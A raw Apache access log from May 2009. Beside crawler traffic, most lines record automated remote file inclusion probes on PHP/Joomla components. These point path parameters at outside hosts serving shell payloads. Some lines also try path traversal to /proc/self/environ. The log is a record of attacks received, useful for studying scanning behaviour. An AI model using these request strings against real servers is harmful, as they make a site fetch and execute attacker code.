91.121.210.42 - - [25/May/2009:20:21:36 -0500] "GET /logs/access_log.1241654400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://dr-nokia.org.ua/media/idxx.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.55.208.141 - - [25/May/2009:20:24:10 -0500] "GET /logs/access_log.1177804800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [25/May/2009:20:24:10 -0500] "GET /logs/access_log.1212278400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [25/May/2009:20:24:10 -0500] "GET /logs/access_log.1141948800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [25/May/2009:20:24:11 -0500] "GET /logs/access_log.1128902400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [25/May/2009:20:24:11 -0500] "GET /logs/access_log.1160092800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [25/May/2009:20:24:11 -0500] "GET /logs/access_log.1154044800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [25/May/2009:20:24:11 -0500] "GET /logs/access_log.1155254400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [25/May/2009:20:24:11 -0500] "GET /logs/access_log.1123632000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [25/May/2009:20:24:11 -0500] "GET /logs/access_log.1216339200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [25/May/2009:20:24:11 -0500] "GET /logs/access_log.1189728000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [25/May/2009:20:24:11 -0500] "GET /logs/access_log.1162598400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [25/May/2009:20:24:11 -0500] "GET /logs/access_log.1213574400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
93.174.0.65 - - [25/May/2009:20:24:19 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
93.174.0.65 - - [25/May/2009:20:24:19 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
93.174.0.65 - - [25/May/2009:20:24:20 -0500] "GET /logs/access_log.1237507200//index.php?DOCUMENT_ROOT=http://www.sapsaree.org/bbs/data/modules/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.230 - - [25/May/2009:20:25:49 -0500] "GET /logs/access_log.1222128000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.165.73.157 - - [25/May/2009:20:26:16 -0500] "GET /main.php?appserv_root=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
121.165.73.157 - - [25/May/2009:20:26:16 -0500] "GET /logs/main.php?appserv_root=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
121.165.73.157 - - [25/May/2009:20:26:16 -0500] "GET /logs/access_log.1231027200/main.php?appserv_root=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
91.121.210.42 - - [25/May/2009:20:27:53 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.210.42 - - [25/May/2009:20:27:53 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.121.210.42 - - [25/May/2009:20:27:53 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
69.94.30.156 - - [25/May/2009:20:28:16 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kecomang.webng.com/id.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.94.30.156 - - [25/May/2009:20:28:16 -0500] "GET /logs/access_log.1242086400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kecomang.webng.com/id.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.94.30.156 - - [25/May/2009:20:28:16 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kecomang.webng.com/id.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
69.94.30.156 - - [25/May/2009:20:28:16 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kecomang.webng.com/id.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.246.20.221 - - [25/May/2009:20:28:28 -0500] "GET /logs/access_log.1242432000///?_SERVER[DOCUMENT_ROOT]=http://spiritualbuildingstones.info/AdvancedGuestBook/public/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.246.20.221 - - [25/May/2009:20:28:31 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://spiritualbuildingstones.info/AdvancedGuestBook/public/id1.txt? HTTP/1.1" 200 190847 "-""Mozilla/5.0"
218.246.20.221 - - [25/May/2009:20:28:32 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://spiritualbuildingstones.info/AdvancedGuestBook/public/id1.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
69.94.30.156 - - [25/May/2009:20:29:20 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kecomang.webng.com/id.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
69.94.30.156 - - [25/May/2009:20:29:20 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kecomang.webng.com/id.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
69.94.30.156 - - [25/May/2009:20:29:20 -0500] "GET /logs/access_log.1239235200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kecomang.webng.com/id.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.94.30.156 - - [25/May/2009:20:29:21 -0500] "GET /logs/access_log.1242086400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kecomang.webng.com/id.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
121.165.73.157 - - [25/May/2009:20:29:54 -0500] "GET /logs/access_log.1237766400/main.php?appserv_root=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
121.165.73.157 - - [25/May/2009:20:29:54 -0500] "GET /logs/access_log.1231200000/main.php?appserv_root=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
65.99.238.244 - - [25/May/2009:20:30:07 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://sez.by/assets/images/otzivi/office1.jpg??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
65.99.238.244 - - [25/May/2009:20:30:07 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://sez.by/assets/images/otzivi/office1.jpg??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
65.99.238.244 - - [25/May/2009:20:30:07 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://sez.by/assets/images/otzivi/office1.jpg??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.99.238.244 - - [25/May/2009:20:30:08 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://sez.by/assets/images/otzivi/office1.jpg??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
91.121.210.42 - - [25/May/2009:20:30:51 -0500] "GET /logs/access_log.1240963200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
62.140.23.192 - - [25/May/2009:20:32:01 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:20:32:01 -0500] "GET /logs/access_log.1242000000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:20:32:01 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:20:32:01 -0500] "GET /logs/access_log.1242172800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:20:32:03 -0500] "GET /logs/access_log.1242000000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:20:32:03 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:20:32:03 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.140.23.192 - - [25/May/2009:20:32:23 -0500] "GET /logs/access_log.1242172800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.98.80.2 - - [25/May/2009:20:34:50 -0500] "GET /logs//errors.php?error=http://ecologypt41.t35.com/idv6.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
65.98.80.2 - - [25/May/2009:20:34:51 -0500] "GET //errors.php?error=http://ecologypt41.t35.com/idv6.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
66.249.68.115 - - [25/May/2009:20:37:59 -0500] "GET /logs/access_log.1145750400 HTTP/1.1" 200 1156 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.164 - - [25/May/2009:20:40:06 -0500] "GET /logs/access_log.1192838400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.7.213.59 - - [25/May/2009:20:40:49 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
217.7.213.59 - - [25/May/2009:20:40:50 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
218.246.20.221 - - [25/May/2009:20:43:14 -0500] "GET /logs/access_log.1242172800///?_SERVER[DOCUMENT_ROOT]=http://spiritualbuildingstones.info/AdvancedGuestBook/public/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.165.73.157 - - [25/May/2009:20:44:35 -0500] "GET /logs/access_log.1233187200/main.php?appserv_root=http://www.aptd.ru/files/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
65.55.107.180 - - [25/May/2009:20:47:48 -0500] "GET /logs/access_log.1148601600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.68.115 - - [25/May/2009:20:49:57 -0500] "GET /logs/access_log.1129334400 HTTP/1.1" 200 1185 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.210.126.218 - - [25/May/2009:20:50:40 -0500] "GET /logs/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.dirk-gerber.de/phpkit/content/download/id2.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.823"
207.210.126.218 - - [25/May/2009:20:50:40 -0500] "GET /includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.dirk-gerber.de/phpkit/content/download/id2.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.823"
65.55.106.212 - - [25/May/2009:20:54:30 -0500] "GET /logs/access_log.1147737600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.22.204.193 - - [25/May/2009:21:02:05 -0500] "GET /logs//errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
203.22.204.193 - - [25/May/2009:21:02:05 -0500] "GET /logs//errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.76"
203.22.204.193 - - [25/May/2009:21:02:05 -0500] "GET //errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
203.22.204.193 - - [25/May/2009:21:02:05 -0500] "GET //errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.76"
66.11.230.36 - - [25/May/2009:21:04:18 -0500] "GET //start.php?pag=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.11.230.36 - - [25/May/2009:21:04:18 -0500] "GET /logs//start.php?pag=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.11.230.36 - - [25/May/2009:21:04:18 -0500] "GET /logs/access_log.1239580800//start.php?pag=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.11.230.36 - - [25/May/2009:21:04:18 -0500] "GET /logs/access_log.1236038400//start.php?pag=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.72.200.26 - - [25/May/2009:21:04:29 -0500] "GET /logs/access_log.1238112000//modules/agendax/addevent.inc.php?agendax_path=http://phpshell.by.ru/fx29id1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
77.72.200.26 - - [25/May/2009:21:04:29 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://phpshell.by.ru/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.72.200.26 - - [25/May/2009:21:04:29 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://phpshell.by.ru/fx29id1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
77.72.200.26 - - [25/May/2009:21:04:37 -0500] "GET /logs/access_log.1239580800//modules/agendax/addevent.inc.php?agendax_path=http://phpshell.by.ru/fx29id1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
116.125.126.72 - - [25/May/2009:21:09:08 -0500] "GET /logs/access_log.1225238400///vwar/backup/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
116.125.126.72 - - [25/May/2009:21:09:08 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
116.125.126.72 - - [25/May/2009:21:09:08 -0500] "GET ///vwar/backup/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
116.125.126.72 - - [25/May/2009:21:09:14 -0500] "GET /logs/access_log.1229126400///vwar/backup/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
38.108.70.51 - - [25/May/2009:21:16:17 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.814"
38.108.70.51 - - [25/May/2009:21:16:17 -0500] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.814"
38.108.70.51 - - [25/May/2009:21:16:43 -0500] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.814"
38.108.70.51 - - [25/May/2009:21:16:43 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.814"
38.108.70.51 - - [25/May/2009:21:16:47 -0500] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.814"
38.108.70.51 - - [25/May/2009:21:16:47 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.814"
38.108.70.51 - - [25/May/2009:21:21:04 -0500] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.814"
38.108.70.51 - - [25/May/2009:21:21:04 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.814"
38.108.70.51 - - [25/May/2009:21:21:19 -0500] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.814"
38.108.70.51 - - [25/May/2009:21:21:19 -0500] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bigfishingforum.com/components/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.814"
212.204.254.82 - - [25/May/2009:21:22:11 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 304 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
212.204.254.82 - - [25/May/2009:21:22:12 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.204.254.82 - - [25/May/2009:21:22:12 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 304 "-""XXXXXX"
212.204.254.82 - - [25/May/2009:21:22:12 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""XXXXXX"
88.80.198.13 - - [25/May/2009:21:22:14 -0500] "GET /includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
88.80.198.13 - - [25/May/2009:21:22:14 -0500] "GET /logs/access_log.1235347200/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.80.198.13 - - [25/May/2009:21:22:14 -0500] "GET /logs/access_log.1236211200/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
88.80.198.13 - - [25/May/2009:21:22:14 -0500] "GET /logs/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
212.204.254.82 - - [25/May/2009:21:22:16 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
212.204.254.82 - - [25/May/2009:21:22:16 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.204.254.82 - - [25/May/2009:21:22:16 -0500] "GET /joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 299 "-""XXXXXX"
212.204.254.82 - - [25/May/2009:21:22:16 -0500] "GET /joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""XXXXXX"
85.10.128.219 - - [25/May/2009:21:23:37 -0500] "GET /logs/access_log.1236211200/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
85.10.128.219 - - [25/May/2009:21:23:37 -0500] "GET /logs/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.10.128.219 - - [25/May/2009:21:23:37 -0500] "GET /includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.10.128.219 - - [25/May/2009:21:23:37 -0500] "GET /logs/access_log.1235347200/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
93.104.211.191 - - [25/May/2009:21:29:05 -0500] "GET /logs//conlib/local.php?cfg[path][contenido]=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
93.104.211.191 - - [25/May/2009:21:29:05 -0500] "GET /logs/access_log.1231286400//conlib/local.php?cfg[path][contenido]=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
93.104.211.191 - - [25/May/2009:21:29:05 -0500] "GET //conlib/local.php?cfg[path][contenido]=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
195.34.78.110 - - [25/May/2009:21:29:50 -0500] "GET /logs//conlib/local.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
195.34.78.110 - - [25/May/2009:21:29:51 -0500] "GET //conlib/local.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
151.1.32.227 - - [25/May/2009:21:30:25 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/ichaon7_oi/cmd.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.813"
151.1.32.227 - - [25/May/2009:21:30:25 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/ichaon7_oi/cmd.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.813"
201.232.54.48 - - [25/May/2009:21:31:18 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:31:18 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:31:18 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:31:22 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:31:22 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
201.232.54.48 - - [25/May/2009:21:31:22 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
93.104.211.191 - - [25/May/2009:21:31:51 -0500] "GET /logs/access_log.1235779200//conlib/local.php?cfg[path][contenido]=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
195.34.78.110 - - [25/May/2009:21:31:53 -0500] "GET //conlib/local.php?cfg[path][contenido]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
195.34.78.110 - - [25/May/2009:21:31:53 -0500] "GET /logs//conlib/local.php?cfg[path][contenido]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
195.34.78.110 - - [25/May/2009:21:31:53 -0500] "GET /logs/access_log.1231286400//conlib/local.php?cfg[path][contenido]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
72.18.148.82 - - [25/May/2009:21:32:11 -0500] "GET /htmltonuke.php?filnavn=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
